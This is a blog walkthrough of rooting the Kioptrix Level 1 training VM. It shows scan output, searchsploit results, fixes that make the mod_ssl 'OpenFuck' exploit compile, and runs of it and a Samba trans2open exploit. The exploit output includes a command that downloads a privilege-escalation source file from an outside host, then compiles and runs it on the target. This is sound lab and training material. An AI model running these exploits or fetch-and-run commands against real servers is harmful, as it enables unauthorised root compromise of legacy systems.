VulnHub - Kioptrix Level 1

I was looking around at various people who did a review of the pwk course and oscp exam and many of had a list of vm’s they used to prepare.

There a quite a few vm’s on vulnhub that is similiar to what you will find in the pwk lab, and the kioptrix series are one of them.

Kioptrix is aimed at beginner and giving them a taste of what pentesting / hacking really is, and yes, don’t be deluded by hollywood. It is not as glamarous as they make it out to be in the movies. It’s hard work, can sometimes be tedious work and LOTS and LOTS of research. You will have plenty of late nights breaking your keyboard over your head.

But if you are serious about being part of this community then you just have to follow Offensive-Security’s infamous quote that strikes fear, confusion and anger into their students..

“Try harder…”

A lot of people think that is not helpful, and that is why they fail. No one will do your work for you. No one will root that box for you. No one will modify that exploit for you, no one will run that sqli because you don’t understand how sql statements work.

You have to put in all the work and you will reap the benefits. Don’t expect to be spoon fed.

These “walkthroughs” that I’ll be doing is to help people who really are trying and struggling with a problem. By just copying and pasting commands without understand what it does and how it works, you will never be anything more than a script kiddie.

Anyway.. for those not scared away, here is what I did to root Kioptrix Level 1.

## Objective

The Kioptrix series is aimed and beginners and thus are pretty easy challenges. The objective is getting root access to the vm via any means possible, except by hacking the actual vm client. The purpose of these vulnerable vm’s are to learn the basic techniques and tools used in penetration tests. There are more than one way of achieving the objective in this challenge.

The Kioptrix Level 1 VM can be downloaded from here. Note that it is an vmware image and can be used in vmware workstation or player. You can convert the image to work on virtualbox.

## The Hack

The first step with every penetration test is intellegence gathering. This consists of passive / active recon and enumeration. Find out which services are running on the target server that are open to the world and which version they are using so that you can search for known vulnerabilities.

To achieve this we will be using a tool that will become the foundation of your pentesting toolkit. Nmap. nmap man page can be found here - it will explain all the options / flags / arguments usable with nmap.

apb@stratios:~$ nmap -sV -A -p- 192.168.163.131

Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-18 16:45 SAST
Stats: 0:01:33 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.75% done; ETC: 16:46 (0:00:00 remaining)
Nmap scan report for 192.168.163.131
Host is up (0.0026s latency).
Not shown: 65529 closed ports
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
|   1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
|   1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_  1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp  open  rpcbind     2 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1           1024/tcp  status
|_  100024  1           1024/udp  status
139/tcp  open  netbios-ssn Samba smbd (workgroup: WMYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|_ssl-date: 2018-01-18T15:02:04+00:00; +16m44s from scanner time.
| sslv2:
|   SSLv2 supported
|   ciphers:
|     SSL2_RC4_64_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|_    SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
1024/tcp open  status      1 (RPC #100024)
Host script results:
|_clock-skew: mean: 16m43s, deviation: 0s, median: 16m43s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: unknown, NetBIOS MAC: unknown (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 268.36 seconds

Above shows us which ports are open on the target server, what services are running on those ports and their versions. Immediately 3 stand out. Port 22 (ssh), 80 (http) and 139(samba).

All of them are very old versions and are “low hanging fruit”. I started with port 22 / ssh for which there did seem to be a exploit but did not get far with that.

Right onto the next one. Port 80 / http.

First ran nikto againt the host to see if it finds any possible and known vilnerabilities on port 80.

apb@stratios:~$ nikto -h 192.168.163.131
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.163.131
+ Target Hostname:    192.168.163.131
+ Target Port:        80
---------------------------------------------------------------------------
+ Server: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ Server leaks inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Thu Sep  6 05:12:46 2001
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OpenSSL/0.9.6b appears to be outdated (current is at least 1.0.1j). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header
+ Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.
+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ OSVDB-682: /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3268: /manual/: Directory indexing found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /test.php: This might be interesting...
+ 8345 requests: 0 error(s) and 21 item(s) reported on remote host
+ End Time:           2018-01-18 18:32:35 (GMT2) (41 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

We are looking for something that allows remote code execution, remote buffer overflows or a remote shell, and the following looks promising.

+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.

Now we know that the host is running a very old version of apache with a vulnerable mod_ssl module. We can use this information to search for exploits.

Offensive Security hosts and maintains the online exploit database https://www.exploit-db.com/. This db is availabe on Kali, so we can use the searchsploit command to search for exploits.

apb@stratios:~$ searchsploit apache mod_ssl
---------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
 Exploit Title                                                                                                                                            |  Path  (/usr/share/exploitdb/)
---------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
Apache mod_ssl 2.0.x - Remote Denial of Service                                                                                                           | exploits/linux/dos/24590.txt
Apache mod_ssl 2.8.x - Off-by-One HTAccess Buffer Overflow                                                                                                | exploits/multiple/dos/21575.txt
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow                                                                                      | exploits/unix/remote/21671.c
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow                                                                                    | exploits/unix/remote/764.c
Apache mod_ssl OpenSSL < 0.9.6d / < 0.9.7-beta2 - 'openssl-too-open.c' SSL2 KEY_ARG Overflow                                                              | exploits/unix/remote/40347.txt

Based on the versions, there are two exploits that could be useful.

Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuck.c' Remote Buffer Overflow
Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow

Excuse their names. I did not name it.. The people who created the exploit named it and unfortuntely the name is crude but accurate because that is what happened to you if you were vulnerable to this exploit.

Unfortunately the exploit did not work “out of the box” and I had to make some changes.

On kali install a missing ssl library.

roott@stratios:~# apt-get install libssl1.0-dev

Next we have to make changes in the exploit before we can compile it. Add 2 openssl headers and fix a download location for another exploit within this one.

Copy the exploit to the /tmp directory so that we can edit it.

root@stratios:/tmp# cp /usr/share/exploitdb/exploits/unix/remote/764.c /tmp/

Add the headers above the other openssl headers at the top of the file.

#include <openssl/md5.h>
#include <openssl/rc4.h>

Search the file for wget and you will get a line for a download of the packetstormsecurity website. That link doesn’t work anymore. Remove it and add the following one

https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

Now we can go ahead and compile the exploit.

root@stratios:/tmp#  gcc -o OpenFsck 764.c -lcrypto

First run ./OpenFsck to see what flags / arguments / options are needed.

Run the exploit.

root@stratios:~# ./OpenFsck 0x6b 192.168.163.131 -c 50

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Connection... 50 of 50
Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f81c8
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
-exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; net/0304
--13:21:23--  https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
           => `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:443... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]

    0K ...                                                   100% @   3.74 MB/s

13:21:24 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921]

[+] Attached to 7346
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...

id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
uname -a
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown

And there we go. A root shell on the target machine.

Since they said there are multiple ways to get into this vm, we will carry on and look for another way.

Next we will try samba. Since nmap did not provide us with a version number, lets try to connect to it and see what happens.

root@stratios:~# smbclient -L=192.168.163.131
WARNING: The "syslog" option is deprecated
Enter root's password:
Server does not support EXTENDED_SECURITY  but 'client use spnego = yes and 'client ntlmv2 auth = yes'
Anonymous login successful
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]

Great we have a version. Use searchsploit again to look for a exploit.

apb@stratios:~$ searchsploit samba 2.2.1
Exploits: No Result
Shellcodes: No Result

Hmmm okay nothing. Lets try again and remove a point in the version.

apb@stratios:~$ searchsploit samba 2.2
---------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                      |  Path
                                                                                                                                                    | (/usr/share/exploitdb/)
---------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Samba 2.0.x/2.2 - Arbitrary File Creation                                                                                                           | exploits/unix/remote/20968.txt
Samba 2.2.0 < 2.2.8 (OSX) - trans2open Overflow (Metasploit)                                                                                        | exploits/osx/remote/9924.rb
Samba 2.2.2 < 2.2.6 - 'nttrans' Remote Buffer Overflow (Metasploit) (1)                                                                             | exploits/linux/remote/16321.rb
Samba 2.2.8 (BSD x86) - 'trans2open' Remote Overflow (Metasploit)                                                                                   | exploits/bsd_x86/remote/16880.rb
Samba 2.2.8 (Linux Kernel 2.6 / Debian / Mandrake) - Share Privilege Escalation                                                                     | exploits/linux/local/23674.txt
Samba 2.2.8 (Linux x86) - 'trans2open' Remote Overflow (Metasploit)                                                                                 | exploits/linux_x86/remote/16861.rb
Samba 2.2.8 (OSX/PPC) - 'trans2open' Remote Overflow (Metasploit)                                                                                   | exploits/osx_ppc/remote/16876.rb
Samba 2.2.8 (Solaris SPARC) - 'trans2open' Remote Overflow (Metasploit)                                                                             | exploits/solaris_sparc/remote/16330.rb
Samba 2.2.8 - Brute Force Method Remote Command Execution                                                                                           | exploits/linux/remote/55.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (1)                                                                                          | exploits/unix/remote/22468.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (2)                                                                                          | exploits/unix/remote/22469.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (3)                                                                                          | exploits/unix/remote/22470.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (4)                                                                                          | exploits/unix/remote/22471.txt
Samba 2.2.x - 'nttrans' Remote Overflow (Metasploit)                                                                                                | exploits/linux/remote/9936.rb
Samba 2.2.x - CIFS/9000 Server A.01.x Packet Assembling Buffer Overflow                                                                             | exploits/unix/remote/22356.c
Samba 2.2.x - Remote Buffer Overflow                                                                                                                | exploits/linux/remote/7.pl
Samba < 2.2.8 (Linux/BSD) - Remote Code Execution                                                                                                   | exploits/multiple/remote/10.c
---------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------

Nothing specifically for 2.2.1, however since we know what version is running on the targer machine, we can compare to the list and there seems to be a match.

Samba < 2.2.8 (Linux/BSD) - Remote Code Execution

Any version number under 2.2.8 is affected, and ours (2.2.1) falls under that category. So lets give it a try.

Copy the exploit to /tmp and compile.

apb@stratios:~$ cp /usr/share/exploitdb/exploits/multiple/remote/10.c /tmp/
apb@stratios:/tmp$ gcc 10.c

Run the exploit.

apb@stratios:/tmp$  ./a.out -b 0 -c 192.168.163.128 192.168.163.131
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Worked!
--------------------------------------------------------------
*** JE MOET JE MUIL HOUWE
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)

Another root shell. They also added a flag somewhere on the OS as proof that you got root access. It can be found in root’s email. You can access it via mutt or read /var/mail/root

Received: (from root@localhost)
        by kioptix.level1 (8.11.6/8.11.6) id n8QFgAZ01831
        for root@kioptix.level1; Sat, 26 Sep 2009 11:42:10 -0400
Date: Sat, 26 Sep 2009 11:42:10 -0400
From: root <root@kioptix.level1>
Message-Id: <200909261542.n8QFgAZ01831@kioptix.level1>
To: root@kioptix.level1
Subject: About Level 2
Status: O

If you are reading this, you got root. Congratulations.
Level 2 won't be as easy...

From root  Thu Jan 18 07:50:24 2018
Return-Path: <root@kioptrix.level1>
Received: (from root@localhost)
        by kioptrix.level1 (8.11.6/8.11.6) id w0ICoOl01319
        for root; Thu, 18 Jan 2018 07:50:24 -0500
Date: Thu, 18 Jan 2018 07:50:24 -0500
From: root <root@kioptrix.level1>
Message-Id: <201801181250.w0ICoOl01319@kioptrix.level1>
To: root@kioptrix.level1
Subject: LogWatch for kioptrix.level1

And there you have it. Granted this was a very easy box, but that was the point, to get people started and not scare them away.

Hope this was helpful to you in some way.

Thanks for reading.

Updated: